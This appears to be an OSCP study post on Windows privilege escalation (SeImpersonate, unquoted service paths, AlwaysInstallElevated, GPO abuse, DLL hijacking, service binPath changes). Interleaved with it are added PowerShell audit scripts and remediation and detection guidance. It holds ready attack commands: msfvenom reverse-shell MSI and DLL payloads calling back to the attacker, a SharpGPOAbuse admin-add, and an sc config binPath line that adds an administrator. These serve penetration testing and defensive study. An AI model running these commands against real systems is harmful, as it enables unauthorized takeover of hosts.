
Windows Privilege Escalation Methods

Windows PrivEsc OSCP Penetration Testing

Below are some of the more common methods of privilege escalation that I have come across during the course of my OSCP journey.

SeImpersonatePrivilege

Allows the holder to impersonate a client's security token. Can be abused to escalate privileges when the account you are running as holds this privilege (service accounts such as IIS application pool or database identities commonly do).

Check:

whoami /priv

Payload / Execution:

  • Juicy Potato / Lovely Potato
  • PrintSpoofer.exe
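whoami /priv only tells you about the token you currently hold. The defender-side question is which accounts on the box have been assigned the privilege at all. The script below is an added example (not part of the original post) that exports the local security policy with secedit.exe and parses the [Privilege Rights] section; the -Offline switch substitutes a constructed sample so the parser runs anywhere, and the made-up S-1-5-21-... SID in that sample stands in for a custom service account.

```powershell
# Added example, not part of the original post: list the principals that hold
# SeImpersonatePrivilege on this host by exporting the local security policy
# with secedit.exe and parsing the [Privilege Rights] section.
# Assumptions: secedit export requires an elevated shell; -Offline swaps the live
# export for a constructed sample so the parser can be exercised anywhere.

function Get-PrivilegeHolders {
    param(
        [string]$Privilege = 'SeImpersonatePrivilege',
        [switch]$Offline
    )

    if ($Offline) {
        # Constructed sample of a [Privilege Rights] section; the last SID is a
        # made-up domain account standing in for a custom service identity.
        $cfgText = @"
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-19,*S-1-5-20,*S-1-5-6,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
"@
    } else {
        $cfg = Join-Path $env:TEMP 'secpol-export.inf'
        & secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $cfgText = Get-Content -LiteralPath $cfg -Raw
        Remove-Item -LiteralPath $cfg -Force
    }

    # Each line looks like: SePrivName = *SID,*SID,...
    $line = ($cfgText -split "`r?`n") |
        Where-Object { $_ -match "^\s*$Privilege\s*=" } |
        Select-Object -First 1
    if (-not $line) { return @() }

    $sids = ($line -split '=', 2)[1].Trim() -split ',' |
        ForEach-Object { $_.Trim().TrimStart('*') }
    foreach ($sid in $sids) {
        # Resolve the SID to a name where the host can; leave unknown SIDs visible
        $account = try {
            ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                [System.Security.Principal.NTAccount]).Value
        } catch { '(unresolved)' }
        [pscustomobject]@{ Privilege = $Privilege; Sid = $sid; Account = $account }
    }
}

# Windows grants the privilege to Administrators, LOCAL SERVICE, NETWORK SERVICE
# and SERVICE by default; anything else (IIS app pools, custom service accounts)
# is what to review. Drop -Offline to read the live policy instead of the sample.
$defaultHolders = 'S-1-5-32-544', 'S-1-5-19', 'S-1-5-20', 'S-1-5-6'
Get-PrivilegeHolders -Offline | Where-Object { $defaultHolders -notcontains $_.Sid }
```

Where a custom service account shows up, the fix is usually to run the service under a virtual or managed service account and trim the privileges the service process actually needs, for which sc.exe privs <service> <privilege list> sets the per-service required privilege set.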

Unquoted Service Path

When a service's binary path contains spaces and is not enclosed in quotation marks, Windows tries each truncated form of the path at every space (each "stop") before reaching the real executable.

Check:

Using PowerUp:

Invoke-AllChecks

If the service name is known:

sc qc servicename

Payload / Execution:

For a service at:

C:\Program Files\New Service\service.exe

Using PowerUp:

Write-ServiceBinary -ServiceName 'New Service' -Path <HijackPath>

OR manually place payload at:
C:\Program.exe
OR
C:\Program Files\new.exe

Then, restart the service to execute the payload:

sc restart "New Service"
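To see the same thing from the audit side, this added example (not from the original post, and not PowerUp code) walks every service, derives the truncated paths Windows would try for an unquoted path with spaces, and flags the ones whose parent directory is writable by ordinary users. The 'New Service' path from the section above is used as a constructed self-test input.

```powershell
# Added example, not part of the original post: audit services for unquoted
# binary paths containing spaces, list the truncated paths Windows would try
# first, and flag those whose parent directory is writable by ordinary users.
# Assumptions: run as an admin on the host being audited; the 'New Service'
# path used in the self-test is the constructed sample from the post.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)

    # Keep only the executable: drop any arguments that follow ".exe"
    $exe = if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
    if ($exe.StartsWith('"') -or -not $exe.Contains(' ')) { return @() }

    # For C:\Program Files\New Service\service.exe Windows tries, in order:
    #   C:\Program.exe, C:\Program Files\New.exe, then the real path.
    $candidates = @()
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $candidates += ($exe.Substring(0, $idx) + '.exe')
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
    return $candidates
}

function Test-UsersCanWrite {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $lowPriv = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
               'Everyone', 'NT AUTHORITY\INTERACTIVE'
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        # 0x2 = CreateFiles/WriteData; 0x40000000 = GENERIC_WRITE (unmapped generic ACE)
        if (($rights -band 0x2) -or ($rights -band 0x40000000)) { return $true }
    }
    return $false
}

function Find-UnquotedServicePaths {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            $svc = $_
            foreach ($cand in Get-UnquotedPathCandidates -PathName $svc.PathName) {
                [pscustomobject]@{
                    Service       = $svc.Name
                    RunsAs        = $svc.StartName
                    PathName      = $svc.PathName
                    Candidate     = $cand
                    UsersCanWrite = Test-UsersCanWrite -Directory (Split-Path -Parent $cand)
                }
            }
        }
}

# Self-test on the constructed path from the post (queries no service):
Get-UnquotedPathCandidates -PathName 'C:\Program Files\New Service\service.exe'

# Live audit: only rows where a low-privileged user could drop the candidate file matter.
Find-UnquotedServicePaths | Where-Object UsersCanWrite | Format-Table -AutoSize
```

The remediation is simply to quote the path, which from PowerShell looks like sc.exe config "New Service" binPath= "\"C:\Program Files\New Service\service.exe\"" (the inner escaped quotes end up in the registry ImagePath value). A service running as SYSTEM with a user-writable candidate directory is the combination worth fixing first.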

AlwaysInstallElevated - Registry Escalation

Check:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

Payload / Execution:

msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 -f msi -o exp.msi
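The reg query above reads only the machine hive, but Windows Installer runs a package as SYSTEM only when AlwaysInstallElevated is 1 under both HKLM and HKCU. This added example (not part of the original post) reads both, reports whether the combination is actually exploitable, and resets it; the HKCU half is whichever user runs the script, so run it as the account being assessed.

```powershell
# Added example, not part of the original post: AlwaysInstallElevated is only
# effective when the value is 1 in BOTH the machine and the user hive, so a
# check that reads HKLM alone is incomplete. This reads both, reports whether
# the combination is exploitable, and can reset it.
# Assumptions: run on the host being checked; the HKCU hive is the current
# user's, so run as the account you are assessing.

$InstallerPolicyPaths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $perHive = foreach ($path in $InstallerPolicyPaths) {
        $value = $null
        if (Test-Path -LiteralPath $path) {
            $value = (Get-ItemProperty -LiteralPath $path -Name AlwaysInstallElevated `
                          -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Path = $path; AlwaysInstallElevated = $value }
    }
    [pscustomobject]@{
        PerHive     = $perHive
        # msiexec runs the package as SYSTEM only when both values are 1
        Exploitable = (@($perHive | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2)
    }
}

function Disable-AlwaysInstallElevated {
    foreach ($path in $InstallerPolicyPaths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        # 0 is the documented "disabled" state. If a GPO keeps re-applying 1,
        # fix the policy itself rather than the registry value on one host.
        Set-ItemProperty -LiteralPath $path -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
    Get-AlwaysInstallElevatedState
}

$state = Get-AlwaysInstallElevatedState
$state.PerHive | Format-Table -AutoSize
"Exploitable: $($state.Exploitable)"
```

The setting lives in Group Policy under Computer Configuration (and User Configuration) > Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges"; it should be Disabled or Not Configured in both places. Installs that do happen are recorded by the MsiInstaller provider in the Application log (event 1033 for a completed install), which is the place to look when hunting for a dropped .msi.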

GPO Abuse

Check:

Using PowerView:

Get-NetGPO

Payload / Execution:

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount Administrator --GPOName "Default Domain Policy"
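Adding a local admin through a GPO only works for a principal that already holds edit rights on that GPO, so the defensive check is to list who can edit each policy. This added example (not from the original post, and not SharpGPOAbuse code) uses the GroupPolicy RSAT module for that; the default $ExpectedEditors list is an assumption to adjust for your domain.

```powershell
# Added example, not part of the original post: enumerate GPOs on which a
# principal outside the expected administrative set holds edit rights, which is
# the precondition for pushing settings such as a new local admin through a GPO.
# Assumptions: the GroupPolicy (RSAT) module is available and the caller can
# read GPO security; the $ExpectedEditors default is an assumption to adapt.
Import-Module GroupPolicy

function Find-GpoEditors {
    param(
        [string[]]$ExpectedEditors = @('Domain Admins', 'Enterprise Admins',
                                       'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS')
    )
    $editRights = 'GpoEdit', 'GpoEditDeleteModifySecurity'

    foreach ($gpo in Get-GPO -All) {
        foreach ($perm in (Get-GPPermission -Guid $gpo.Id -All)) {
            if ($perm.Denied) { continue }                   # deny entries are not grants
            if ($editRights -notcontains [string]$perm.Permission) { continue }
            $trustee = $perm.Trustee.Name
            if ($ExpectedEditors -contains $trustee) { continue }
            [pscustomobject]@{
                Gpo         = $gpo.DisplayName
                Status      = $gpo.GpoStatus
                Trustee     = $trustee
                TrusteeType = $perm.Trustee.SidType
                Permission  = $perm.Permission
                Inherited   = $perm.Inherited
            }
        }
    }
}

# Anyone listed here can push settings (local admins, scheduled tasks, startup
# scripts) to every computer the GPO links to, so treat the right as tier-0.
Find-GpoEditors | Sort-Object Gpo, Trustee | Format-Table -AutoSize
```

Edits to a GPO show up as event 5136 (directory service object modified) on the domain controller once "Audit Directory Service Changes" is enabled and the groupPolicyContainer objects carry an auditing entry, which is how a change to "Default Domain Policy" by an unexpected account gets caught after the fact.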

DLL Hijacking

Check:

Using PowerUp:

Invoke-AllChecks

Payload / Execution:

With PowerUp:

Write-HijackDll -DllPath 'C:\Program Files\program\func.dll'

Manually generate DLL:

# 32-bit
msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=tun0 LPORT=443 > exp.dll

# 64-bit
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=tun0 LPORT=443 > exp.dll

binPath Modification

Check:

accesschk64.exe -wuvc daclsvc

Confirmation: Look for SERVICE_CHANGE_CONFIG

Payload / Execution:

sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
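accesschk gives you the answer for one service; to review every service, or to check a host where accesschk is not present, you can read the SDDL that sc sdshow prints. This added example (not part of the original post) parses that SDDL and reports allow-ACEs granting a broad low-privileged group SERVICE_CHANGE_CONFIG or a right that lets the holder grant it to themselves (WRITE_DAC, WRITE_OWNER, GENERIC_WRITE, GENERIC_ALL). The $SampleSddl string is constructed for the self-test, and daclsvc is just the name from the section above.

```powershell
# Added example, not part of the original post: parse the SDDL that
# "sc.exe sdshow <service>" prints and report allow-ACEs that hand a broad,
# low-privileged group the rights needed to reconfigure a service.
# Assumptions: $SampleSddl is a constructed string for the self-test; 'daclsvc'
# is the name from the post and need not exist on your host.

$ServiceRightCodes = @{            # two-letter SDDL codes as they map on service objects
    CC = 'SERVICE_QUERY_CONFIG';   DC = 'SERVICE_CHANGE_CONFIG'
    LC = 'SERVICE_QUERY_STATUS';   SW = 'SERVICE_ENUMERATE_DEPENDENTS'
    RP = 'SERVICE_START';          WP = 'SERVICE_STOP'
    DT = 'SERVICE_PAUSE_CONTINUE'; LO = 'SERVICE_INTERROGATE'
    CR = 'SERVICE_USER_DEFINED_CONTROL'
    SD = 'DELETE'; RC = 'READ_CONTROL'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
    GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE'; GR = 'GENERIC_READ'; GX = 'GENERIC_EXECUTE'
}
# Rights that allow changing binPath directly, or rewriting the ACL to allow it
$DangerousCodes = 'DC', 'WD', 'WO', 'GA', 'GW'
$DangerousMask  = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
# Well-known SID aliases for groups every ordinary user falls into
$BroadSids = @{ BU = 'BUILTIN\Users'; AU = 'Authenticated Users'; WD = 'Everyone'
                IU = 'INTERACTIVE';   BG = 'BUILTIN\Guests';      AN = 'ANONYMOUS' }

function Get-ServiceSddlFindings {
    param([Parameter(Mandatory)][string]$Sddl, [string]$ServiceName = '(sample)')

    # Keep the DACL only: everything between "D:" and the optional "S:" SACL
    if ($Sddl -notmatch 'D:(.*?)(?:S:|$)') { return @() }
    $dacl = $Matches[1]

    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        # ACE fields: type;flags;rights;object_guid;inherit_guid;sid
        $f = $m.Groups[1].Value -split ';'
        if ($f.Count -lt 6 -or $f[0] -ne 'A') { continue }   # allow ACEs only
        $rights = $f[2]; $sid = $f[5]

        if ($rights -match '^0x') {
            # Rights may also be written as a hex access mask
            $mask = [Convert]::ToInt64($rights.Substring(2), 16)
            $hits = if ($mask -band $DangerousMask) { @("MASK:$rights") } else { @() }
        } else {
            $codes = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
            $hits  = @($codes | Where-Object { $DangerousCodes -contains $_ } |
                       ForEach-Object { $ServiceRightCodes[$_] })
        }
        if ($hits.Count -eq 0) { continue }

        $principal = if ($BroadSids.ContainsKey($sid)) { $BroadSids[$sid] } else { $sid }
        [pscustomobject]@{
            Service   = $ServiceName
            Principal = $principal
            BroadSid  = $BroadSids.ContainsKey($sid)
            Rights    = $hits -join ','
            Ace       = $m.Value
        }
    }
}

function Get-ServiceDaclFindings {
    param([Parameter(Mandatory)][string]$Name)
    $sddl = (& sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    Get-ServiceSddlFindings -Sddl $sddl -ServiceName $Name
}

# Constructed SDDL: default-looking entries plus one deliberately weak ACE that
# gives BUILTIN\Users SERVICE_CHANGE_CONFIG (the DC code in the BU entry).
$SampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
              '(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRP;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Get-ServiceSddlFindings -Sddl $SampleSddl | Format-Table -AutoSize
# Live check of the service named in the post:
#   Get-ServiceDaclFindings -Name daclsvc | Where-Object BroadSid
```

On the sample the BA entry is reported too (it legitimately has DC, WD and WO), which is why the BroadSid column exists: only rows where BroadSid is true need attention. The fix is to rewrite the service DACL with sc.exe sdset using an SDDL that leaves DC/WD/WO to SYSTEM and Administrators. For detection, sc config binpath= ends up as a write to the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<name>, which Sysmon records as event 13 (registry value set) if that key is in scope.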

Kernel Exploits

Reference repositories for Windows kernel exploits:

Other Methods

  • UAC Bypass: fodhelper, accesschk, psexec with -accepteula, taihou
  • Registry: AutoRun and other registry-based methods
  • Password Mining: Configuration files and memory extraction